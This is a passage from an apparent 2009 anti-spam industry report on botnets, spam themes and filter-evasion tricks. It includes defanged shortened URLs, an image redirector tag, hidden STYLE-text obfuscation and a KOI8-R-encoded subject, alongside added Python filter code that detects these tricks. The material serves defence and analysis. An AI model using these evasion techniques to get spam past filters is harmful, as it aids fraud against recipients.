3.2.5. Mega-D and the Zombie Renaissance: Botnets Become Harder to Disrupt
On 4 November, a team of researchers from FireEye [3] initiated a series of activities in order
to disrupt and wrestle for control of the Mega-D (Ozdok) botnet. By virtue of a coordinated
effort with several ISPs, the effort was initially hugely successful and the Mega-D botnet
was crippled overnight. This remained the case for a further nine days, but with a twist of
irony, on Friday 13 November, Mega-D effectively rose from the dead and large volumes of
spam were pumped-out again. Further investigation of the traffic showed that 95% of the IP
addresses being used after the resurgence had never before been connected with Mega-D.
This is rather revealing as it suggests that the botnet controllers responsible for Mega-D had
a backup strategy, perhaps a collection of “sleeper” bots that were previously inactive and
had now been activated – possibly another lesson the spammers learned from the McColo
takedown.

3.3. How Events in 2009 and Celebrity News Shaped the Spam Landscape
The global credit crisis and the election of U.S. President Barack Obama provided two major
themes to much of the spam blocked in early 2009. Other events, festivities and news
stories also contributed to many spam themes in 2009, including St. Valentine’s Day on
14 February, St. Patrick’s Day and NCAA March Madness in the U.S. in March; the 4 July
Independence Day in the U.S., the global flu pandemic of H1N1, the fatal crash of Air France
flight 447 as well as the deaths of singer Michael Jackson and actor Patrick Swayze.

Figure 6: Example of H1N1 spam


Following the death of Michael Jackson on 25 June, the topic was quickly adopted in several
spam campaigns and at the time, approximately 1% of all spam referenced Michael Jackson.

[3] http://blog.fireeye.com/research/2009/11/smashing-the-ozdok.html

Figure 7: Typical spam email following the death of Michael Jackson


Malware and even 419-type advance fee fraud campaigns exploiting the Michael Jackson
topic were not far behind, with the first examples appearing in the days following his death,
including a Brazilian banking Trojan which was distributed via malicious hyperlinks contained
in spam emails. A banking Trojan is able to intercept and capture an individual’s credentials,
and these examples specifically targeted Brazilian banks.

Figure 8: Malware website with content relating to the death of Michael Jackson
Even before Jackson’s death, news of Farrah Fawcett’s passing precipitated a spate of spam
purporting to relate to her death, and later, when the death of Patrick Swayze was announced
on 15 September, it was only a matter of time before the spammers and cyber criminals used
the opportunity to tailor their output accordingly.

3.3.1. Global Economic Recession Emerged as a Key Spam Theme in 2009


The financial gloom has served as a popular topic for spammers and fraudsters, especially
during the first half of 2009. As credit became harder to secure through traditional means
and the global economic woes provided consumers with uncertainty, spammers, fraudsters
and phishers added the recession to their list of themes to leverage.
In February, spam containing hyperlinks to a number of major well-known search engines
delivered much of the early recession-based spam. The hyperlinks were not using auto-
mated redirection links as had been seen previously, but using an automated search for the
spammers’ website domains. Search engine spamming techniques enable the spammers
to include a hyperlink constructed from a search engine query within the body of the email.
When the link is followed it leads the browser to the spammers’ websites.

Figure 9: Examples of typical spam emails linked to global recession in 2009


The use of search engines in this way allows spammers to include hyperlinks to their
websites without using a hyperlink to the actual spam domain. This makes it harder for tra-
ditional anti-spam techniques that rely on the knowledge and reputation of domains used
in hyperlinks to make a judgment as to the likelihood of the message being spam or not.
This was just one early example of the importance that reputable domains would play in
the spammers’ arsenal. It becomes impossible for anti-spam technology to rely on this
information to block spam messages, without impacting legitimate users of those domains
and services. This particular technique relied on the user clicking on the link displayed in
the search results – it was not automatically redirected and the instructions for this were
included in the email itself.
During the early part of 2009, MessageLabs Intelligence also became aware of an increase in
genuine emails being sent by cash-strapped individuals who had turned to email as a means
of seeking charitable assistance, support or guidance from a number of businesses. These
messages are small in volume by comparison with the wider volume of spam and phishing
emails, but seemingly equally liable to provoke an inflamed response from many recipients
who believed they were fakes or scams.
3.3.2. From St. Valentine’s Day to Halloween, Thanksgiving and Christmas
The Cutwail botnet was identified as the main source of St. Valentine’s Day spam messages
in February. St. Valentine’s Day spam accounted for as much as 9% of all spam around 14
February, with the Cutwail botnet responsible for 6.5% of this, with almost 3% connected
with the Xarvester botnet. Approximately 1 in 15 messages sent by the Cutwail botnet were
St. Valentine’s Day themed. With subjects such as “St. Valentine’s Bonus” and “Make this
Valentine’s Day the most memorable ever,” the Cutwail botnet was sending approximately 7
billion spam emails each day; perhaps the largest ever St. Valentine’s Day spam campaign.
In 2008, St. Valentine’s spam originated from the infamous Storm (aka Peacomm) botnet
and accounted for only 2% of daily spam levels.
In the twilight months of 2009, the holiday season including Halloween and Thanksgiving
in the U.S., was an important time of year for many spammers. MessageLabs Intelligence
identified a relatively small proportion of spam messages, accounting for less than 0.5%
of all spam emails that were related to Halloween, and spam subjects included, “Biggest
deal this halloween,” “A HORRIFYING HALLOWEEN SALE!” and “Halloween discount.” The
bewitching emails were distributed from both the Rustock and Donbot botnets, in roughly
equal amounts. The majority of this type of spam linked to pharmaceutical or medical spam
websites.
With Halloween, Thanksgiving and Christmas so close together on the calendar, it appeared
one of the spam gangs using the Cutwail botnet became confused. While their goal seemed
to be to sell replica watches, the spammers used both Thanksgiving and Christmas as
themes in their messages. However, they sometimes mixed-up the subjects in the process.

Figure 10: Spam emails with mixed-up Thanksgiving and Christmas themes
Ultimately, these spammers are unlikely to care about such overlap; perhaps the use of both
Thanksgiving and Christmas themes in the same emails doubled their chances of catching
people’s attention. MessageLabs Intelligence identified significant numbers of spam
messages related to Thanksgiving, accounting for approximately 2% of all spam by the end of
November, equivalent to more than two billion Thanksgiving-themed spam emails in
circulation globally each day.
Some particularly keen spammers had already turned their attention to 2010 St. Valentine’s
Day, sending romantic themed emails more than three months in advance. Again sent from
the Cutwail and Rustock botnets, these spam messages relate to pharmaceutical and medi-
cal spam, often linked to the ubiquitous Canadian Pharmacy.

3.4. Spam and the Importance of CAPTCHAs


CAPTCHAs (Completely Automated Public Turing tests to tell Computers and Humans Apart),
the visual or audio “puzzles” that are important anti-spam features on many websites,
became very much top of mind for bad guys towards the end of 2008 as CAPTCHA-breaking
tools were readily traded in the underground economy. The ability of these tools to break
a CAPTCHA meant that cyber criminals were able to create large numbers of real
accounts for webmail, instant messaging and social networking websites. These accounts
would subsequently be used to send spam messages, or host fake profiles that would also
be used for hosting spam content and in other social engineering attacks and drive-by
installs of web-based malware and rogue security software.
In the financial climate at the time, the apparent opportunity to raise capital from a small
investment may have seemed an attractive proposition for those who may have been finding
it difficult to obtain credit by traditional means.
As an alternative approach to breaking CAPTCHAs in this way, there are also businesses in
countries like India that specialize in providing real people to create real accounts on
major webmail services on a 24-hour basis. Often advertised as a data processing
job, each worker can be expected to receive approximately two to three dollars per 1,000
accounts created, accounts which are then sold on to the spammers for around $30 to $40.
The days of the traditional approach to CAPTCHAs may be well and truly numbered as some
major sites are already investigating alternatives to them. In some cases large libraries
of photographic images have been experimented with, in which the user must be able
to analyze or interact with the image in such a way that would be very challenging for a
computer program.
3.4.1. CAPTCHA Technology Will Improve in 2010
As this happens and spammers have a more difficult time breaking CAPTCHA codes through
automated processes, spammers in emerging economies will devise a means to use real
people to manually generate new accounts for spamming, thereby attempting to bypass the
improved technology. MessageLabs Intelligence estimates that the individuals employed to
manually create these accounts will be paid less than 10% of the cost to the spammers, with
the account-farmers charging U.S. $30-40 per 1,000 accounts.


3.5. Spam Tactics Including Free Services, Image Spam and Shortened URLs
MessageLabs Intelligence recorded a further rise in spam levels during the first half of 2009,
particularly in April and May, when much of the increase was attributed to spam with very little
content other than a subject line and a valid hyperlink or an image.

Figure 11: Spam linked to free social networking profiles


In many cases these hyperlinks pointed to a different active profile on one of a number
of major social networking environments. These profiles appeared to have been created
using random names, perhaps with automated CAPTCHA-breaking tools. The benefit to the
spammers of using such accounts is that the emails are sent from valid accounts on major
free-webmail hosting providers, which in turn means that the headers were correct for the
domains from which each message originated. The emails were not being spoofed, as was
often the case for these types of domains in the past. Techniques to check the validity of
these headers are ineffective as anti-spam countermeasures, as all they will establish is that
the sender is genuine and not spoofed or sent from a botnet.
3.5.1. Donbot Spam Turns to Social Networks
On 18 November 2009, MessageLabs Intelligence tracked a huge jump in the number of
spam emails that contained links to a popular micro-blogging website. This trend has
typically been very low, averaging less than 1% of all spam traffic, but on 18 November it
jumped to more than 4% of all spam. This new surge was entirely from the Donbot botnet.
Figure 12: Trend of Donbot spam containing hyperlinks to social profiles (chart: percentage of all spam, 0% to 9%, per day from 16 Nov to 24 Nov)


The intention of these emails seemed to be to attract people to a series of “get rich by
working at home” schemes, where the individual is encouraged to pay an initial fee for a trial
and then sit back and watch the cash come in.
Although blocked as spam, this new run combined a number of techniques in an attempt
to evade basic spam filters. Firstly, the body of the email is comprised simply of an image,
giving the appearance of a newspaper article, to try and get past text-based signatures.

Figure 13: Donbot image spam with hyperlinks to micro-blogging profiles


Secondly, the main image in the emails was linked to profile pages on a popular micro-
blogging service, again in an attempt to bypass hyperlink-based signatures. As a legitimate
reputable website, it would be very difficult to block without intercepting large volumes of
perfectly innocent emails as well.
The hyperlinks to the profile pages are to a recent posting from that account containing a
short message encouraging visitors to follow a further hyperlink contained in the posting.

Figure 14: Micro-blogging profile referenced in Donbot spam


This Donbot spam campaign came to an abrupt halt at midnight (GMT) on 23 November,
as the botnet ceased sending the spam emails altogether. Lasting for five days, the spam
campaign peaked at around 8.4% of all spam on 22 November, but averaged 5% for the
duration of the campaign, projected to account for more than three billion spam emails per
day.
Further analysis revealed that there were only three different images hosted on a small
number of social networking profiles and multimedia file-sharing sites. However, more than
3,000 individual accounts had been used in this campaign, which seemed to be a mixture of
hijacked accounts that were quite old, and had genuine-looking updates, and false accounts
that had been established purely for the purpose of spamming, which contained only
spam-like links. These were likely to have been created using CAPTCHA-breaking tools or by
employing sweat-shops of real people in less wealthy economic conditions to create them
manually to be sold on to the spammers.
This scam has also been observed using hijacked accounts from other popular social
networking websites, where the scammers have used a legitimate account that did not
belong to them in order to post notifications to the owner’s circle of friends. These updates
contained links to the same accounts on a popular micro-blogging service that were already
used in the spam emails intercepted previously.
The websites referenced in the hyperlinks are seemingly rather hastily assembled with much
of the site content not functional, for example in the screenshot below, the links to the menu
items across the top of the page were inactive as were the social bookmarking links further
down. These websites seem to be clearly targeting people seeking alternative sources of
income online, which may seem particularly attractive to some people during the harsh
economic climate of 2009.


Figure 15: Spam website linked from social profiles


Furthermore, when accessing some of the content elsewhere on the websites, the visitor is
redirected to other spam and scam websites or asked to complete their personal contact
information in order to receive the money-making toolkits. Interestingly, the websites
include several positive comments after the articles, but the links to post comments are
inactive, which is another indicator that these websites should be regarded with a degree of
suspicion.
MessageLabs Intelligence expects a return to this type of spam activity in 2010, if not before
the end of 2009.
3.5.2. Taking Stock of Image Spam
In January 2009, MessageLabs Intelligence tracked a return to stock-spam, levels of which
had been almost non-existent since the indictment of notorious spammer Alan Ralsky, in
early 2008.
On 24 November, Alan Ralsky, the self-proclaimed “Godfather of Spam” and three other men
were sentenced to prison terms for their roles in an email stock fraud scheme. According to
anti-spam group Spamhaus, Ralsky had been spamming since 1997, using many different
aliases and tens of thousands of compromised computers to relay his spam. The sentences
ranged from 32 to 51 months in prison, including a penalty of U.S. $500,000.
It seemed that another criminal group had sought to emulate Ralsky’s earlier success with
the return of stock-spam in 2009, with emails containing image attachments, such as .GIF or
.JPG that were a graphical rendering of the text of the spam message. Not since 2007 were
spam emails relating to penny stocks being intercepted in such large volumes. Moreover,
many of these emails were being sent from legitimate accounts on some of the major, free
webmail hosting providers. These accounts were seemingly being created with CAPTCHA-
breaking tools.


Figure 16: Typical example of image spam from early 2009


In figure 16, the message includes the following URL in order to present the image in the
message:
<img src="http://[redux].com/log?srvc=xmibx&goto=http://[redux].cn/10.gif" border=0 alt="Qbjwjvuda Click Here!">
We can follow the path of this redirection to another site, which in turn is redirected again,
before the image is finally delivered. The domain name of the original hyperlink is preserved
as the image is downloaded, and is passed in the URL as a parameter, for example:
http://[redirected ip address]/10.gif?[original domain]
It is believed that this may be used by the spammers to track the usage of each domain,
perhaps in order to identify its longevity and effectiveness over time.
The use of images that contained text rendered into a graphic was a popular tactic to evade
traditional spam filtering techniques that would attempt to analyze the patterns of words
in the body of the email text, but could not easily work on an image. In a resurgence during
2009, these images were now being hosted on freely available websites and hyperlinks to
them were being included in spam emails, often using redirection links from other reputable
sites in order to hide the true location of the image hosting website.
Figure 17: Chart showing increase of image spam as % of spam over time in 2009 (series: % spam with remotely hosted image, % spam with image attached; monthly from Jan to Nov 2009, 0% to 40%)


Image spam activity peaked on 5 April when 56.4% of spam was identified as image spam,
but the average proportion of image spam for all of 2009 was 28.2%.
By June 2009, image spam was again being attached to spam messages, rather than being
hosted remotely and displayed as HTML images. Some of these included background noise
patterns that had been generated in an automated fashion to obfuscate the content from
anti-spam analysis. Almost certainly sent from a botnet, the emails often contained no
hyperlinks, with the spammers’ website names frequently included in the content of the
images.
The technique of using reputable domains in spam emails is employed by spammers in a
bid to evade spam filters that examine the domains of the hyperlinks contained in the email
and use what is known about those domains to make a judgment about the nature of that
email and the likelihood that it contains a spam message.
3.5.3. URL-Shortened Spam and Reputable Domains
During 2009, with the explosion of social networking and micro-blogging services, there
has been a plethora of URL-shortening services available on the Internet, and many do not
require users to register or complete a CAPTCHA in order to use their services.
The use of these free URL redirection services, which turn lengthy web addresses into
shortened URLs, became increasingly popular with spammers, as the shortened URLs
disguise the real destination and, because they use reputable domains, help to allay any
concerns about the legitimacy of the link. URL-shortening services hide the true
website hyperlink by replacing it with the domain of the service followed by a unique key
that redirects the visitor to the original link. Spammers were able to take advantage of
these free redirection services simply by including the shortened URL in their spam messages.
As these shortened hyperlinks used reputable legitimate domains, it was harder for traditional
anti-spam filters to identify the messages as spam based on the reputation of the URL
domains.
By mid-2009, many of these services were being abused by spammers operating on many of
the social network and micro-blogging services using fake profiles and posting comments
that link to these redirection domains.
Here are some examples:
hXXp://is.gd/yvzs#cctrtfcphhww.mail.[redux].com
hXXp://is.gd/ymyl#rzsuuyhvcwr.mail.[redux].com
hXXp://is.gd/ymyl#rzsuuyhvcwr.mail.[redux].com
hXXp://tinyurl.com/2572434838#qcgkehbkfuxrn.[redux].com.tw
hXXp://www.x.se/[redux]#slidesilvana
hXXp://tr.im/dv0b#kbdhfhdbl[redux]vnmatq.yuk4a
hXXp://pr.mail.[redux].co.jp/gyao
Note the use of the ‘#’ fragment identifier (the part of a URL that points to an HTML anchor) in
some of these hyperlinks. This symbol has a legitimate purpose in HTML hyperlinks, but the
spammers take advantage of this fact and append fragments containing random strings of
letters and numbers. This approach is intended to confuse anti-spam technology that may
rely on fingerprinting the entire URL. The fragment is ignored by the URL shortening service
and is used here purely for obfuscation. In total, 1% of shortened URL spam in 2009 used this
technique, which is seen only very occasionally.


Figure 18: Example of spam with shortened URL

Rank  Short URL service  % of shortened URL spam
1     bit.ly             12.2%
2     o.ly                9.9%
3     aafter.us           9.3%
4     tcbp.net            8.9%
5     jtty.com            6.8%
6     tlink.me            6.7%
7     myurl.in            6.0%
8     snurl.com           5.7%
9     is.gd               5.7%
10    sturly.com          5.5%
Figure 19: Table of top-10 URL-shortening services used
Furthermore, 77% of URL-shortened spam relied on just 10 different URL-shortening
services. Recipients of these hyperlinks would be unaware of their true location just by
looking at them and would need to follow the links by clicking on them in order to determine
their true location.
URL-shortening is frequently used on social networking and micro-blogging sites and is
popular because of the inherent trust relationships that exist between users, which is why it
is considered acceptable to click on a link from a trusted friend.
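As an added example that is not part of the report, the following Python shows how a filter can neutralise the fragment trick described above (by fingerprinting the link without its fragment, exactly as the shortening service sees it) and, over the same URLs, produce the kind of per-service breakdown shown in figure 19. The sample URLs are constructed from the report's examples with placeholder hosts in place of the redacted ones, and the set of known shortening services is taken from the names the report gives.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed sample URLs modelled on the report's examples; the hosts in the
# fragments and the final URL are placeholders. "hXXp" is the report's defanged form.
SAMPLE_URLS = [
    "hXXp://is.gd/yvzs#cctrtfcphhww.mail.example.com",
    "hXXp://is.gd/ymyl#rzsuuyhvcwr.mail.example.com",
    "hXXp://is.gd/ymyl#rzsuuyhvcwr.mail.example.com",
    "hXXp://tinyurl.com/2572434838#qcgkehbkfuxrn.example.com.tw",
    "hXXp://www.x.se/REDACTED#slidesilvana",
    "hXXp://tr.im/dv0b#kbdhfhdblvnmatq.yuk4a",
    "hXXp://pr.mail.example.co.jp/gyao",
]

# Shortening services named in the report (figure 19 and the examples above).
KNOWN_SHORTENERS = {
    "bit.ly", "o.ly", "aafter.us", "tcbp.net", "jtty.com", "tlink.me", "myurl.in",
    "snurl.com", "is.gd", "sturly.com", "tinyurl.com", "tr.im", "x.se",
}


def refang(url):
    """Turn the defanged hXXp:// notation back into a parseable scheme."""
    return re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE)


def host_of(url):
    """Lower-cased host without a leading www., for service identification."""
    return (urlsplit(refang(url)).hostname or "").removeprefix("www.")


def fingerprint(url):
    """Canonical key for reputation lookups: host plus path and query, with the
    fragment dropped, because the browser never sends it to the shortener."""
    parts = urlsplit(refang(url))
    key = host_of(url) + parts.path
    if parts.query:
        key += "?" + parts.query
    return key


def shortener_service(url):
    host = host_of(url)
    return host if host in KNOWN_SHORTENERS else None


def fragment_obfuscated(url):
    """True when a shortener link carries a fragment: the service ignores it, so
    its only effect is to make every copy of the link look unique to a naive filter."""
    return shortener_service(url) is not None and urlsplit(refang(url)).fragment != ""


def shortener_share(urls):
    """Percentage of shortened-URL spam per service, in the style of figure 19."""
    counts = Counter(s for s in map(shortener_service, urls) if s)
    total = sum(counts.values())
    return {svc: round(100.0 * n / total, 1) for svc, n in counts.most_common()}


if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(f"{fingerprint(url):32} fragment-obfuscated={fragment_obfuscated(url)}")
    print(shortener_share(SAMPLE_URLS))
```

With the fragment removed, the three is.gd links in the sample collapse to two fingerprints, so a reputation verdict for one copy of the link applies to every other copy the spammer sends.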
Figure 20: URL shortened spam in 2009 (chart: percentage of all spam, 0% to 10%, per week from 5 Apr to 15 Nov 2009; peak 9.3%)


By 28 July, 9.3% of all spam included a shortened URL domain, equivalent to more than 10
billion spam messages per day worldwide. The Donbot botnet was responsible for sending
approximately five billion spam messages each day, and was one of the main culprits for
using this technique. Most of these spam runs related to casino, bingo or gambling spam.
By the end of 2009 this technique had become less commonplace, but other major botnets
had also given it a go, including Cutwail, Rustock and Xarvester.
Many of the more popular URL-shortening services were quick to respond in stamping out
this abuse by withdrawing the abused links, but many of the newer, less familiar services
were less responsive and many of these URLs could remain active for several days after the
initial spam runs.
3.5.4. Obfuscation and Information Hiding
Obfuscation is often used inside spam messages to improve their chances of evading
spam filters, and in 2009 many examples included the use of HTML style tags to hide
random text intended to confuse anti-spam filters. For example:
<STYLE>Ysavu ujkuibito Yna wuc</STYLE>
The text between the HTML STYLE tags is not actually displayed in the email message and
remains hidden from view, but some traditional and perhaps naïve anti-spam filters may be
thrown off the scent by the use of this simple technique. This method has also been used to
break up hyperlink domains, for example:
www.spammerdomain<STYLE>Zowjqs otuwaqito Fodi ahqwu</STYLE>name.cn
In the example above, the text in between the HTML style tags will not be displayed, but
some anti-spam tools may simply strip out HTML tags before performing their analysis; they
are then confused and may take the domain in this example to be ahqwuname.cn rather
than www.spammerdomainname.cn.
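The redirector pattern shown in figure 16 and the STYLE-tag obfuscation described in this section are both handled correctly by a filter that treats the message body as HTML structure rather than as flat text: hidden elements are dropped with their content, and an image URL is parsed so that a second URL smuggled in its query string becomes visible. The Python below is an added example, not code from the report or from MessageLabs; the sample markup is constructed on the model of the report's examples and the hostnames are placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed samples modelled on the report's examples; hostnames are placeholders.
IMG_SAMPLE = (
    '<img src="http://redirector.example.com/log?srvc=xmibx&goto=http://'
    'images.example.net/10.gif" border=0 alt="Qbjwjvuda Click Here!">'
)
STYLE_SAMPLE = (
    "Great offer <STYLE>Ysavu ujkuibito Yna wuc</STYLE>at "
    "www.spammerdomain<STYLE>Zowjqs otuwaqito Fodi ahqwu</STYLE>name.cn"
)

HIDDEN_ELEMENTS = {"style", "script"}   # content a mail client never renders as text
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)


class BodyScanner(HTMLParser):
    """Collects the text a recipient would actually see, plus remote image URLs.
    Text inside style/script elements is dropped instead of merged into the body."""

    def __init__(self):
        super().__init__()
        self._hidden_depth = 0
        self.text_chunks = []
        self.images = []

    def handle_starttag(self, tag, attrs):
        if tag in HIDDEN_ELEMENTS:
            self._hidden_depth += 1
        elif tag == "img":
            src = dict(attrs).get("src")
            if src:
                self.images.append(src)

    def handle_endtag(self, tag):
        if tag in HIDDEN_ELEMENTS and self._hidden_depth:
            self._hidden_depth -= 1

    def handle_data(self, data):
        if not self._hidden_depth:
            self.text_chunks.append(data)


def scan(html):
    """Return (visible text, [image URLs]) for an HTML mail body."""
    scanner = BodyScanner()
    scanner.feed(html)
    scanner.close()
    return "".join(scanner.text_chunks), scanner.images


def naive_strip_tags(html):
    """What the naive filter in the report does: remove the tags, keep everything else."""
    return re.sub(r"<[^>]+>", "", html)


def extract_domains(text):
    return DOMAIN_RE.findall(text)


def redirect_targets(image_url):
    """URLs carried in an image URL's query string: the redirector pattern of figure 16."""
    query = parse_qs(urlsplit(image_url).query)
    return [value for values in query.values() for value in values
            if value.lower().startswith(("http://", "https://"))]


if __name__ == "__main__":
    print("naive:  ", extract_domains(naive_strip_tags(STYLE_SAMPLE)))
    print("visible:", extract_domains(scan(STYLE_SAMPLE)[0]))
    for src in scan(IMG_SAMPLE)[1]:
        print(src, "->", redirect_targets(src))
```

On the STYLE sample the naive approach yields two domains that do not exist in the message, while the structural scan recovers www.spammerdomainname.cn; on the image sample the scan exposes the second host behind the first, which a reputation check would otherwise never see.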

3.6. The Language of Spam


The proportion of spam written in English was higher in 2009 than in the previous year, with
Russian language spam being a very prominent feature during the summer of 2008, but not
nearly as significant in 2009.

Figure 21: Breakdown of global spam by language
English 95.3%
Unknown 2.4%
French 0.65%
Portuguese 0.55%
Russian 0.53%
German 0.28%
Chinese 0.10%
Japanese 0.05%
Spanish 0.05%
Italian 0.04%
Other known language 0.02%


After English, the most common languages for spam are French, Portuguese, Russian and
German, in that order.
German is still a very common language for spam and large bursts of German spam are
often observed over the normal German-language spam background traffic. Portuguese-
language spam is becoming more common, particularly in Brazil. Very occasionally there will
be a big wave of Italian-language spam. Chinese and Japanese spam does feature in global
spam, but not as much as in those countries themselves.
The use of the KOI8-R Russian language character set was identified in approximately 1 in
147 spam emails each day during 2009, 2% of which were actually in English, but where the
email subjects were encoded using the Russian character set in order to hide the English
language content. The Russian character set is typically used to encode the Cyrillic alphabet;
however, in these examples it is only used to encode the 26-letter English language Roman
alphabet, such as in the following example:
Subject: Real manliness is renewable at any age √ make sure yourself.
When viewing the original source code of the email message from the previous example, the
subject is actually comprised as follows:
Subject: =?koi8-r?B?QmVpbmcgd2VhbHRoeSBpcyBhYm91dCBiZWluZyBoZWFsdGh5IJYgbGVh?==?koi8-r?B?cm4gaG93Lg==?=
Here, the Russian character set is being used by the spammers to hide the true meaning
behind the message. The subject is decoded by the email program and displayed correctly
in English. This unnecessary use of another character set to encode the English language
subject is purely to hide the true content of the subject of the message, and a technique
sometimes used by spammers to avoid content filters that do not decode the character set
in their analysis.
Many examples of this type of spam were sent from the Cutwail botnet, and they included
the Bredolab Trojan in .ZIP file attachments to spam emails purporting to originate from
major couriers, with subjects referring to postal tracking numbers. There is more
information on Bredolab later in this report.
Other non-Latin character sets, such as Japanese and Chinese, do not appear to have been
used by spammers in the same way, however.
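A content filter defeats this trick by decoding the RFC 2047 encoded words before analysis, and can go one step further: if a subject is declared as KOI8-R but decodes to almost nothing but ASCII, the character set is serving no linguistic purpose. The Python below is an added example, not code from the report or from MessageLabs. It decodes the encoded subject quoted above (the one non-ASCII byte in it, 0x96, is a Windows-1252 dash that KOI8-R renders as the √ seen in the displayed subject), and compares it with a constructed, genuinely Russian subject; the charset list and the 95% threshold are assumptions.

```python
import base64
from email.header import decode_header

# The encoded Subject header quoted in the report, reproduced here as sample input.
SAMPLE_SUBJECT = (
    "=?koi8-r?B?QmVpbmcgd2VhbHRoeSBpcyBhYm91dCBiZWluZyBoZWFsdGh5IJYgbGVh?="
    "=?koi8-r?B?cm4gaG93Lg==?="
)

# Constructed control case: a genuinely Russian subject, where koi8-r is appropriate.
LEGIT_RUSSIAN_SUBJECT = (
    "=?koi8-r?B?"
    + base64.b64encode("Привет, коллеги".encode("koi8-r")).decode("ascii")
    + "?="
)

# Character sets whose legitimate use should yield mostly non-ASCII bytes (assumed list).
NON_LATIN_CHARSETS = {
    "koi8-r", "koi8-u", "windows-1251", "iso-8859-5",
    "gb2312", "gbk", "big5", "shift_jis", "euc-jp", "euc-kr",
}
ASCII_THRESHOLD = 0.95  # assumed: above this share of ASCII the charset serves no purpose


def decoded_parts(raw_header):
    """RFC 2047 decoding. Returns (display string, [(raw bytes, charset), ...])."""
    parts = []
    display = []
    for payload, charset in decode_header(raw_header):
        if isinstance(payload, bytes):
            parts.append((payload, (charset or "ascii").lower()))
            display.append(payload.decode(charset or "ascii", errors="replace"))
        else:
            display.append(payload)   # plain, unencoded header text
    return "".join(display), parts


def ascii_share(payload):
    """Fraction of printable ASCII (plus tab/newline) bytes in the decoded payload."""
    if not payload:
        return 1.0
    printable = sum(1 for b in payload if 0x20 <= b < 0x7F or b in (0x09, 0x0A, 0x0D))
    return printable / len(payload)


def charset_mismatch(raw_header):
    """True when a non-Latin charset wraps text that is (almost) entirely ASCII,
    i.e. the encoding is being used for concealment rather than for a language."""
    _, parts = decoded_parts(raw_header)
    return any(charset in NON_LATIN_CHARSETS and ascii_share(payload) >= ASCII_THRESHOLD
               for payload, charset in parts)


if __name__ == "__main__":
    for header in (SAMPLE_SUBJECT, LEGIT_RUSSIAN_SUBJECT):
        text, parts = decoded_parts(header)
        print(repr(text), [(c, round(ascii_share(p), 2)) for p, c in parts],
              "mismatch" if charset_mismatch(header) else "ok")
```

The decoded text is what a content filter should score; the mismatch flag on its own is only a weak signal and belongs in a scoring system alongside the other indicators the report describes, not as a standalone block rule.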
3.6.1. Automated Spam Translation
During 2009, spam levels in countries where English was not the primary language had
increased significantly. Levels in Germany and The Netherlands increased by 13% since the
beginning of the year, with spam now accounting for in excess of 95% of all emails. Mes-
sageLabs Intelligence uncovered one of the tactics that contributed to this increase, the use
of automated translation services to enable multiple language spam runs.
Globally, the majority of spam was in English, and around 5% (1 in 20) of spam messages were
in a non-English language.
To evaluate the language for recipients in a particular country, MessageLabs Intelligence
analyzed spam blocked for each client country where there was a sufficiently large range of
domains available.
In figure 22, it can be seen that for 2009, Brazil had the highest percentage of spam that
was in the local language, Portuguese (40%), followed by Italy (35%), and China (19%).
Brazil (18%) also has the lowest percentage of English-language spam.
The Nordic countries of Sweden, Finland, Norway and Denmark had a very low proportion of
spam in their local language, with between 50 and 60% of spam in English. However, South
Africa had a very high proportion of English-language spam (91%), as did Switzerland,
Thailand and India – all had more than 80% of their spam in English.
Taiwan, China, Hong Kong, Singapore and Indonesia had the highest percentage of Chinese-
language spam, especially China and Taiwan, with between 18 and 20% of spam in Chinese.
Interestingly, nearly everywhere received a small volume of Chinese-language spam.

Rank  Country      Local Language         Spam %
1     Brazil       Portuguese             40.5%
2     Italy        Italian                35.0%
3     China        Chinese                18.6%
4     Austria      German                 18.4%
5     France       French                 17.6%
6     Germany      German                 17.0%
7     Spain        Spanish                15.8%
8     Portugal     Portuguese             14.9%
9     Belgium      French/Dutch/German    13.3%
10    Japan        Japanese                7.4%
11    Netherlands  Dutch                   6.5%
12    Switzerland  French/German/Italian   6.5%
13    Denmark      Danish                  5.8%
14    Sweden       Swedish                 4.7%
15    Finland      Finnish/Swedish         1.4%
16    Norway       Norwegian               0.7%
Figure 22: Analysis of spam language by country
Analyzing the proportion of spam in non-English-speaking countries shows that the volume of
English-language spam can be much lower than in predominantly English-speaking countries,
because spammers targeted those countries with spam in the local language rather than
sending English-language spam to everyone. For instance, by the end of 2009, 17.0% of all
spam in Germany was in German, 6.5% of spam in The Netherlands was in Dutch and 17.6% of
spam in France was in French. In Japan 7.4% was in Japanese and in China 18.6% of spam
was in Chinese.
Further analysis of the same spam data from the perspective of the country code top-level
domains (CCTLDs) revealed some further interesting patterns, as seen in figure 23.

Rank  CCTLD  Local Language          Spam %
1     .be    French/Dutch/German      9.6%
2     .ch    French/German/Italian    9.0%
3     .at    German                   6.0%
4     .de    German                   5.9%
5     .fr    French                   5.5%
6     .br    Portuguese               5.3%
7     .pt    Portuguese               4.9%
8     .dk    Danish                   3.9%
9     .it    Italian                  3.6%
10    .es    Spanish                  2.9%
11    .nl    Dutch                    1.3%
12    .cn    Chinese                  1.1%
13    .jp    Japanese                 0.8%
14    .se    Swedish                  0.6%
15    .fi    Finnish/Swedish          0.3%
16    .no    Norwegian                0.0%
Figure 23: Analysis of spam language by CCTLD
This was rather surprising, as the expectation had been that CCTLDs would receive a greater
proportion of spam in the local language. In fact, they generally received a lower proportion
of local-language spam, for example:
• In Brazil, .br CCTLDs received 5% of spam in Portuguese, but customers with their registered
location as Brazil received 41% of spam in Portuguese;
• In China, .cn CCTLDs received 1% of spam in Chinese, but customers registered in China
received 19% of spam in Chinese;
• In Germany, .de CCTLDs received 6% of spam in German, but customers registered in
Germany received 18% of spam in German.
So what possible explanation can there be for this? Why would a company based in China be
more likely to receive Chinese spam sent to a .com domain than to a .cn one? The answer
was actually rather straightforward: spammers were being more careful in selecting the
domains they target with a particular language. Rather than simply choosing domains with
the TLD for that country, they were researching and targeting companies known to be based
in China, which were therefore more likely to have Chinese-speaking employees.
Automating this kind of approach may not be a simple task, but investing time up-front in
preparing target domains for their Chinese spam runs means that spammers could maximize
their potential responses. This trend was identical across all of the countries analyzed.
Moreover, the CCTLDs that were most likely to receive English-language spam were India,
Singapore, Indonesia, Japan and Hong Kong. The CCTLDs least likely to receive English-
language spam were Denmark, Sweden, Finland, Taiwan and Thailand.
The CCTLDs most likely to receive Chinese-language spam were Singapore, Hong Kong, Tai-
